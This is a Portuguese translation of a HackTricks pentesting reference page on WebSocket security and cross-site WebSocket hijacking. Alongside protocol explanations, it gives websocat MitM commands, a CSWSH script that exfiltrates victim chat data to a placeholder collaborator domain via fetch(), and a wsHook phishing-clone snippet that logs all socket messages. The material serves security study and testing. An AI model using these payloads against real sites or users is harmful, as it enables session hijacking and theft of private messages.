12 KiB
Cross-site WebSocket hijacking (CSWSH)
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e para o repositório hacktricks-cloud.
O que são WebSockets
As conexões WebSocket são iniciadas por meio do HTTP e geralmente são de longa duração. As mensagens podem ser enviadas em ambas as direções a qualquer momento e não são transacionais por natureza. A conexão normalmente permanecerá aberta e ociosa até que o cliente ou o servidor esteja pronto para enviar uma mensagem.
Os WebSockets são particularmente úteis em situações em que são necessárias mensagens de baixa latência ou iniciadas pelo servidor, como feeds em tempo real de dados financeiros.
Como as conexões WebSocket são estabelecidas?
(Aqui você encontrará um resumo, mas um guia mais detalhado sobre como uma conexão de web socket é criada pode ser encontrado aqui).
As conexões WebSocket são normalmente criadas usando JavaScript do lado do cliente, como o seguinte:
var ws = new WebSocket("wss://normal-website.com/chat");
O protocolo wss
estabelece um WebSocket sobre uma conexão TLS criptografada, enquanto o protocolo ws
usa uma conexão não criptografada.
Para estabelecer a conexão, o navegador e o servidor realizam um handshake WebSocket sobre HTTP. O navegador emite uma solicitação de handshake WebSocket como a seguinte:
GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket
Se o servidor aceita a conexão, ele retorna uma resposta de handshake do WebSocket como a seguinte:
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
Neste ponto, a conexão de rede permanece aberta e pode ser usada para enviar mensagens WebSocket em ambas as direções.
Nota
Várias características das mensagens de handshake do WebSocket são dignas de nota:
- Os cabeçalhos
Connection
eUpgrade
na solicitação e resposta indicam que este é um handshake WebSocket. - O cabeçalho de solicitação
Sec-WebSocket-Version
especifica a versão do protocolo WebSocket que o cliente deseja usar. Isso é tipicamente13
. - O cabeçalho de solicitação
Sec-WebSocket-Key
contém um valor aleatório codificado em Base64, que deve ser gerado aleatoriamente em cada solicitação de handshake. - O cabeçalho de resposta
Sec-WebSocket-Accept
contém um hash do valor enviado no cabeçalho de solicitaçãoSec-WebSocket-Key
, concatenado com uma string específica definida na especificação do protocolo. Isso é feito para evitar respostas enganosas resultantes de servidores mal configurados ou proxies de cache.
O cabeçalho Sec-WebSocket-Key
contém um valor aleatório para evitar erros de proxies de cache e não é usado para fins de autenticação ou manipulação de sessão (Não é um token CSRF).
Console Linux
Você pode usar o websocat
para estabelecer uma conexão bruta com um websocket.
websocat --insecure wss://10.10.10.10:8000 -v
Ou para criar um servidor websocat:
websocat -s 0.0.0.0:8000 #Listen in port 8000
Conexões websocket MitM
Se você descobrir que os clientes estão conectados a um websocket HTTP a partir da sua rede local atual, você pode tentar um Ataque de Spoofing ARP para realizar um ataque MitM entre o cliente e o servidor.
Assim que o cliente tentar se conectar, você pode usar:
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
Enumeração de WebSockets
Você pode usar a ferramenta https://github.com/PalindromeLabs/STEWS para descobrir, identificar e procurar por vulnerabilidades conhecidas em websockets automaticamente.
Hijacking de WebSocket entre sites (CSWSH)
Também conhecido como hijacking de WebSocket entre origens cruzadas.
É um Cross-Site Request Forgery (CSRF) em um handshake de WebSocket.
Isso ocorre quando a solicitação de handshake de WebSocket depende exclusivamente de cookies HTTP para o tratamento de sessões e não contém nenhum token CSRF ou outros valores imprevisíveis.
Um atacante pode criar uma página da web maliciosa em seu próprio domínio que estabelece uma conexão de WebSocket entre sites com o aplicativo vulnerável. O aplicativo lidará com a conexão no contexto da sessão do usuário vítima com o aplicativo.
Ataque Simples
Observe que ao estabelecer uma conexão websocket, o cookie é enviado para o servidor. O servidor pode estar usando-o para relacionar cada usuário específico com sua sessão de websocket com base no cookie enviado.
Então, se, por exemplo, o servidor websocket enviar de volta o histórico da conversa de um usuário se uma mensagem com "READY" for enviada, então um simples XSS estabelecendo a conexão (o cookie será enviado automaticamente para autorizar o usuário vítima) enviando "READY" será capaz de recuperar o histórico da conversa:
<script>
websocket = new WebSocket('wss://your-websocket-URL')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
websocket.send("READY"); //Send the message to retreive confidential information
}
function handleReply(event) {
//Exfiltrate the confidential information to attackers server
fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
}
</script>
Cross Origin + Cookie com um subdomínio diferente
Neste post de blog https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/, o atacante conseguiu executar Javascript arbitrário em um subdomínio do domínio onde a comunicação do websocket estava ocorrendo. Como era um subdomínio, o cookie estava sendo enviado, e como o Websocket não verificava a Origem corretamente, era possível se comunicar com ele e roubar tokens dele.
Roubo de dados do usuário
Copie a aplicação web que você deseja se passar (os arquivos .html, por exemplo) e dentro do script onde a comunicação do websocket está ocorrendo, adicione este código:
//This is the script tag to load the websocket hooker
<script src='wsHook.js'></script>
//These are the functions that are gonig to be executed before a message
//is sent by the client or received from the server
//These code must be between some <script> tags or inside a .js file
wsHook.before = function(data, url) {
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "client_msg?m="+data, true);
xhttp.send();
}
wsHook.after = function(messageEvent, url, wsObject) {
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "server_msg?m="+messageEvent.data, true);
xhttp.send();
return messageEvent;
}
Agora baixe o arquivo wsHook.js
em https://github.com/skepticfx/wshook e salve-o dentro da pasta com os arquivos web.
Expondo a aplicação web e fazendo um usuário se conectar a ela, você será capaz de roubar as mensagens enviadas e recebidas via websocket:
sudo python3 -m http.server 80
Outras vulnerabilidades
Como os Web Sockets são um mecanismo para enviar dados para o lado do servidor e do cliente, dependendo de como o servidor e o cliente manipulam as informações, os Web Sockets podem ser usados para explorar várias outras vulnerabilidades, como XSS, SQLi ou qualquer outra vulnerabilidade comum da web usando a entrada de um usuário de um websocket.
WebSocket Smuggling
Essa vulnerabilidade pode permitir que você bypass as restrições dos proxies reversos fazendo-os acreditar que uma comunicação websocket foi estabelecida (mesmo que não seja verdade). Isso pode permitir que um atacante acesse endpoints ocultos. Para mais informações, consulte a seguinte página:
{% content-ref url="h2c-smuggling.md" %} h2c-smuggling.md {% endcontent-ref %}
Referências
{% embed url="https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os PLANOS DE ASSINATURA!
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e para o repositório hacktricks-cloud.